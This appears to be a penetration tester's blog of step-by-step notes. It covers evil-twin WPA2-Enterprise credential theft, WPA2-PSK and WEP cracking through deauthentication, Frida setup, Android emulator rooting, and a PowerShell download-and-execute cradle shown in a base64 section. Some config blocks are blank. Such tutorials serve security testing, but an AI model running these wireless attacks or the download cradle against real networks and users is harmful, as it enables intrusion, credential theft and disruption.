Base64 Encoding and Decoding


Encoding using powershell:

$str = ‘iex (new-object net.webclient).downloadstring(‘’)’


Note that Unicode can be changed to ASCII or UTF8 as well

Decoding using powershell:


Note that Unicode can be changed to ASCII or UTF8 as well

Encoding using cmd:

echo This is a test > test.txt

certutil -encode test.txt encodedtest.txt

Decoding using cmd, assuming certutil -encode was used:

findstr /v CERTIFICATE encodedtest.txt > decodedtest.txt

type decodedtest.txt


Encoding using Linux terminal

echo -n ‘This is a test’ | base64

Decoding using Linux terminal

base64 -d YmVubGVleXIud29yZHByZXNzLmNvbQ==

Windows Word/Excel Reset Macro Trust

Sometimes while testing “malicious” macro, you might need “distrust” the document, as Windows trusts it after you enable executing macro in it. To do that:

Step 1) Launch Word > Options

Step 2) Click Trust Center, then click Trust Center Settings

Step 3) Click Trusted Documents, then click Clear

WPA2-Enterprise Wireless Pentesting

There are multiple variations of WPA-2 Enterprise. In this case, the focus is on the tool. This post is about using hostapd-mana and freeradius to create a evil twin network then stealing client credentials

Step 1) Have a wireless card that you can set to monitor mode, then run the commands below:

sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up

Step 2) Then run airodump-ng to gather details about the WiFi network. Obtain the required details below.

sudo airodump-ng wlan0mon
  1. BSSID –
  2. Channel –
  3. ESSID –

Step 3) Stop the process, then run airodump-ng again to gather specific information and Station information. See “Troubleshooting Steps” if no Stations appear.

sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID from Step 2>
  1. Station –

Step 4) Stop the process, then run airodump-ng again to output the captured traffic to PCAP

sudo airodump-ng -c <channel> --bssid <BSSID from Step 2> -w out wlan0mon

Step 5) Launch another terminal and deauthenticate client, to sniff cert used during authentication

sudo aireplay-ng -0 20 -b <BSSID from Step 2> -h <Station from Step 3> wlan0mon

Step 6) Stop airodump-ng and aireplay-ng, then inspect the PCAP file with Wireshark

sudo wireshark out-01.cap &

Step 7) In Wireshark, use the filter “tls.handshake.certificate”.

Zoom in to the Packet Details > TLSv1 Record Layer > Handshake Protocol > Certificates > Certificate

Right click “Certificate: <super long hex string>” then click Export as Bytes and name it as certificate.der

Step 8) Use openssl to obtain information about the certificate, with special focus on the “Issuer:” section

openssl x509 -inform der -in certificate.der -text

C = countryName

ST = stateOrProvinceName

L = localityName

O = organizationName

emailAddress = self explanatory

CN = commonName

Step 9) Change to root

sudo -s

Step 10) Modify freeradius certificate config

nano /etc/freeradius/3.0/certs/ca.cnf
  1. Search for, or scroll down to [certificate_authority] section
  2. Modify the countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the same content as Step 8
  3. Note that commonName should be encapsulated in ” “

Step 11) Modify freeradius server config

nano /etc/freeradius/3.0/certs/server.cnf
  1. Search for, or scroll down to [server] section
  2. Modify the countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the same content as Step 8
  3. Note that commonName should be encapsulated in ” “

Step 12) Create certificate in freeradius by navigating to certs folder, then execute make command

cd /etc/freeradius/3.0/certs

Step 13) Create a hostapd-mana eap user config file with the content after the nano command:

nano /etc/hostapd-mana/mana.eap_user


Step 14) Create a hostapd-mana config file with the content after the nano command:

nano /etc/hostapd-mana/mana.conf

#Wireless information

ssid=<ESSID from Step 2>



channel=<channel from Step 2>


#EAP information





#Certificate information




#Setting nonsensical password to the private key



#Setting some WPA details




wpa_pairwise=CCMP TKIP

#Setting mana config





Step 15) Start hostapd-mana

hostapd-mana /etc/hostapd-mana/mana.conf

Step 16) If required, deauthenticate clients from their networks to trick them into joining your rogue network

sudo aireplay-ng -0 5 -b <BSSID from Step 2> wlan0mon

Step 17) Inspect hostapd-mana output, there should be domain\username, and encrypted passwords in ASLEAP, JTR and HASHCAT output.

For simplicity, launch a new terminal, then use ASLEAP to crack passwords, as the whole command is provided from hostapd-mana

sudo asleap -C <first portion> -R <second portion> -W /usr/share/john/password.lst

Step 18) Create a wpa_supplicant config file to be used in step 19:

nano wpa2enterprise.conf











Step 19) Connect to the WPA2-Enterprise network using wpa_supplicant

sudo wpa_supplicant -B -i wlan0 -c wpa2enterprise.conf

Step 20) Obtain IP address from the wireless router

sudo dhclient -v wlan0

Step 21) Perform further pivoting / attacks, then disconnect from the network

sudo killall wpa_supplicant

WPA2-PSK Wireless Pentesting

Step 1) Have a wireless card that you can set to monitor mode, then run the commands below:

sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up

Step 2) Then run airodump-ng to gather details about the WiFi network. Obtain the required details below.

sudo airodump-ng wlan0mon
  1. BSSID –
  2. Channel –
  3. ESSID –

Step 3) Stop the process, then run airodump-ng again to gather specific information and Station information. See “Troubleshooting Steps” if no Stations appear.

sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID of SSID to attack> wlan0mon
  1. Station –

Step 4) Stop the process, then run airodump-ng again to output the captured traffic to PCAP

sudo airodump-ng -c <channel> --bssid <BSSID of SSID to attack> -w out wlan0mon

Step 5) Launch another terminal then run aireplay-ng to perform a deauthentication attack, to capture WPA2 handshake

sudo aireplay-ng -0 5 -a <BSSID of SSID to attack> -h <MAC address of client to deauthenticate> wlan0mon

Step 6) Monitor airodump-ng terminal until you see a “WPA handshake: ” at the top right of the output. Once that is visible, stop airodump-ng and aireplay-ng with CTRL+C

Step 7) Crack the WPA2 Password with aircrack-ng and a wordlist

aircrack-ng -w /usr/share/wordlists/rockyou.txt out-01.cap

Step 8) Create a wpa_supplicant config file to be used in step 10:

nano wpa2config.conf





Step 9) Connect to the WPA2 network using wpa_supplicant

sudo wpa_supplicant -B -i wlan0 -c wpa2config.conf

Step 10) Obtain IP address from the wireless router

dhclient -v wlan0

-v for verbose

Step 11) Perform further pivoting / attacks, then disconnect from the network

sudo killall wpa_supplicant

Troubleshooting Steps

If no Stations are listed in Step 3, try spamming deauthentication attacks to force clients to reconnect back to the wireless network and appear in your airodump-ng listing

sudo aireplay-ng -0 5 -a <BSSID from Step 2> wlan0mon

-0 5 to perform deauthentication attack five times

WEP Wireless Pentesting

Step 1) Have a wireless card that you can set to monitor mode, then run the commands below:

sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up

Step 2) Then run airodump-ng to gather details about the WiFi network. Obtain the required details below.

sudo airodump-ng wlan0mon
  1. BSSID –
  2. Channel –
  3. ESSID –

Step 3) Stop the process, then run airodump-ng again to gather specific information and Station information. See “Troubleshooting Steps” if no Stations appear.

sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID of SSID to attack> wlan0mon
  1. Station –

Step 4) Stop the process, then run airodump-ng again to output the captured traffic to PCAP

sudo airodump-ng -c <channel> --bssid <BSSID of SSID to attack> -w out wlan0mon

Step 5) Launch another terminal then run the command below

sudo aireplay-ng -3 -b <BSSID of SSID to attack> -h <Station MAC address from Step 3> wlan0mon

Step 6) Wait for around 100,000 data packets in #Data, then stop the airodump-ng and aireplay-ng processes

Step 7) Crack WEP key using aircrack-ng

sudo aircrack-ng out-01.cap

Step 8) Create a wpa_supplicant config file to be used in step 9

nano wepconfig.conf







Step 9) Connect to the WEP network using wpa_supplicant

sudo wpa_supplicant -B -i wlan0 -c wepconfig.conf

-B to put process in background

-i to specify physical interface

Step 10) Obtain IP address from the wireless router

dhclient -v wlan0

-v for verbose

Step 11) Perform further pivoting / attacks, then disconnect from the network

sudo killall wpa_supplicant

Troubleshooting Steps

If no Stations are listed in Step 3, try spamming deauthentication attacks to force clients to reconnect back to the wireless network and appear in your airodump-ng listing

sudo aireplay-ng -0 5 -a <BSSID from Step 2> wlan0mon

-0 5 to perform deauthentication attack five times


Installing Frida on Windows for Android Virtual Devices

Step 1) Follow through all steps in and ensure you have root on your Android Virtual Device

Step 2) Install python3 from

Step 3) Launch command prompt and run the command “pip”.

If you receive an error message, search for “Add or remove programs” in Windows then access it.

Step 4) Search for Python 3, then click Modify.

Step 5) Click Modify.

Step 6) Tick pip, then proceed with the installation.

Step 7) Launch command prompt and type the following command:

pip install frida-tools

Wait for installation to complete, then type the following command to verify that Frida is successfully installed.

frida –v

Step 8) Navigate to, go to the latest release then click Show all xxx assets

Then download the latest frida-server (16.1.5 at the time of this post) with the appropriate CPU type matching your Android OS (likely x86_64 if you followed my previous WordPress post)

Step 9) Unzip the .xz file, and rename the unzipped folder to something shorter, like “frida-server”

Navigate into the folder, then rename the only file inside to “frida-server”. Yes, remove the extension if any.

Step 10) Open command prompt, navigate to your frida-server folder and run the following commands

adb push frida-server /data/local/tmp/
adb shell "su -c chmod 755 /data/local/tmp/frida-server"
adb shell "su -c /data/local/tmp/frida-server &"

The command prompt will appear to hang. Leave it as it is.

Step 11) Launch another command prompt and run the following command:

adb devices -l

The device name that appears for you will likely be different. Memorize it. It will be used repeatedly

Step 12) Run the following command:

frida-ps -D <your device name>

Frida is now working.


TS 1 – If running adb shell “su -c /data/local/tmp/frida-server &” returns a error message that port xxxxx is in use, restart the Android Virtual Device, then re-run the command again

TS 2 – If your command prompt is unable to find the adb command even with Android Studio installed, run the commands below:

set PATH=%LOCALAPPDATA%\Android\Sdk\emulator;%PATH%

set PATH=%LOCALAPPDATA%\Android\Sdk\platform-tools;%PATH%

Rooting Virtual Android Device on Windows

Step 1) Download ZIP from, unzip it to a folder in Desktop

Step 2) Download and Install Android Studio from

Step 3) Launch command prompt and run the following two commands

set PATH=%LOCALAPPDATA%\Android\Sdk\emulator;%PATH%

set PATH=%LOCALAPPDATA%\Android\Sdk\platform-tools;%PATH%

Step 4) Launch Android Studio > click More Actions > Virtual Device Manager

Step 5) Choose any device with access to Play Store (e.g. Pixel 3a) > click Next

Step 6) Click the download icon beside Tiramisu > select it when its done downloading > click Next

Note the API Level 33. This will be used later

Step 7) Verify config page > click Finish

Step 8) Click the Play button to launch your virtual Android device

Step 9) Launch cmd prompt, navigate to your unzipped rootAVD folder in step 1, then launch rootAVD.bat ListAllAVDs.

Note the android-33 which matches in Step 6.

Step 10) As seen in Step 6, we’re using Android API version 33. So run the following command

rootAVD.bat system-images\android-33\google_apis_playstore\x86_64\ramdisk.img

Step 11) When prompted, choose either 1 or 2 then press Enter

Step 12) Your Android Device should be auto shut down.

Close your Device Manager page as there seems to be a visual bug preventing you from clicking Play to launch your Android device

In Android Studio > click More Actions > Virtual Device Manager > click Play button

Step 13) In Android virtual device, hold left click + swipe up > launch Magisk

Step 14) When prompted, click OK, then click the Back button

Step 15) Go to command prompt, type the following. Permission will be denied, its ok!

adb shell


Step 16) Go back to Android device, click Superuser icon at the bottom in the Magisk app

Step 17) Ensure that Superuser rights are given to Shell

Step 18) In command prompt, type su again and observe successful elevation to root


Android images are stored in C:\Users\<username>\AppData\Local\Android\Sdk\system-images

ADB exe is stored in C:\Users\<username>\AppData\Local\Android\Sdk\platform-tools